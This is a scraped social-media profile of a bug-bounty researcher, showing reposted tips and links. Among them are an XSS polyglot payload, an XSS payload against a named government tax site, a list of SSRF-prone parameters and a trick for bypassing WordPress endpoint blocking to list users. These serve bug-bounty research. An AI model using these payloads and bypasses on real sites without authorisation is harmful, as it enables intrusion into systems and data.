@proffe00 Profile picture

Dip mondal

@proffe00

cybersecurity Researcher | .--. FINDING some Cool THINGs..

Joined December 2020
Similar User
JustinBmz photo

@Justin85563950

mehrab opi🇧🇩 photo

@mehrab_opi33500

Saiful Islam photo

@bubalula_yeee

Mohit verma 09 (Modi Ka Parivar) photo

@mohitchaudhry05

Harel photo

@H4R3L

zy9ard3 photo

@zy9ard3

Chirag 0x22 🇮🇳 photo

@ChiragSoni404

sahabalam photo

@H_freaks1

Kylm photo

@0xKylm

𝑮𝒐𝒖𝒓𝒂𝒗 𝑫𝒉𝒊𝒎𝒂𝒏 𝑰𝒏𝒔𝒂𝒏 photo

@GouravDhimanIn1

𝗣𝗘𝗔𝗖𝗘 𝗥𝗘𝗔𝗟𝗧𝗬 photo

@peacerealty07

Rafin Rahman Chy photo

@rafinrahmanchy

gutem@corteximplant.com photo

@GutemHC

Saudi photo

@tnsaudi

Mahmoud 🇵🇸 photo

@M7moud_mk99

Dip mondal Reposted

I along with @aszx87410 was recently able to find an interesting case of a DOM based xss in figma.com Sharing the details in this writeup as the bug is fixed now github.com/Sudistark/xss-…


Dip mondal Reposted

SSRF Parameters 🔥🔥🔥 Worth greppin for 🔥🔥 1.?host= 2.?redirect= 3.?uri= 4.?path= 5.?continue= 6.?url= 7.?window= 8.?next= 9.?data= 10.?image-source= 11.?n= 12.?to= 13.?follow= 14.?u= 15.?go= 16.?fetch= 17.?source= 18.?img-src= #bugbountytips #bugbountytip #bugbounty


Dip mondal Reposted

Nettacker: Automated Penetration Testing Framework - Open-Source Vulnerability Scanner github.com/OWASP/Nettacker

Tweet Image 1

Dip mondal Reposted

🕸 Website: "Please enter your first name" 😎 You: "jaVasCript:/-//*\/'/"/*/(/ */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e"


Getting a free delivery by singing up from "admin_@glovoapp.com" hackerone.com/reports/1296584


Dip mondal Reposted

XSS in @IncomeTaxIndia Payload: lookhere');});</script><img src=x onerror=alert('XSS')> 1)the keyword “lookhere” was used to detect all the places the input was reflected 2)The rest is responsible for balancing the payload #infosec #bugbountytips #xss

Tweet Image 1

Dip mondal Reposted

If you are getting blocked on #WordPress websites when trying to access an endpoint then you can use the parameter “rest_route” to bypass it. https://***.com/blog/wp-json/wp/v2/users BLOCKED https://***.com/blog/?rest_route=/wp/v2/usersOK #bugbountytips #bugbounty #security


Dip mondal Reposted

Cyber-Bookmarks: a list of bookmarks that contains lists of resources/articles that will help bug bounty hunters with resources that are useful during their bug bounty journey. x0rb3l.github.io/Cyber-Bookmark… #cybersecurity #malware #bugbounty #hacking

Tweet Image 1

Loading...

Something went wrong.


Something went wrong.